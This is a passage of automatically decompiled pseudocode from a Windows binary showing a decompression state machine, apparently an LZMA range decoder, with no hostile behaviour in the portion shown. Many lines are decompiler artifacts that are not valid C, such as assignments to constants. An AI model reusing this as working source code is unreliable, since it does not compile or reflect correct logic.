									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004068EF))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													L53:
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L161:
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											L59:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												L65:
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L165:
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											L110:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											goto L132;
										case 0x12:
											L128:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L131:
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												L132:
												 *(_t644 - 0x54) = _t642;
												goto L133;
											}
											L129:
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											L141:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L143:
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *((intOrPtr*)(__ebp - 0x7c)) = 0x14;
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
											L142:
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											L156:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											while(1) {
												L140:
												 *(_t644 - 0x88) = _t537;
												goto L1;
											}
										case 0x15:
											L91:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											goto L0;
										case 0x17:
											while(1) {
												L145:
												 *(_t644 - 0x50) = 1;
												 *(_t644 - 0x48) =  *(_t644 - 0x40);
												goto L149;
											}
										case 0x18:
											goto L146;
										case 0x19:
											L94:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												L98:
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													L166:
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												L121:
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												L122:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											L95:
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												L97:
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													L107:
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														L118:
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													L113:
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														L117:
														goto L109;
													}
												}
												L103:
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													L106:
													goto L99;
												}
											}
											L96:
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L162:
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											L57:
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												L163:
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											L77:
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
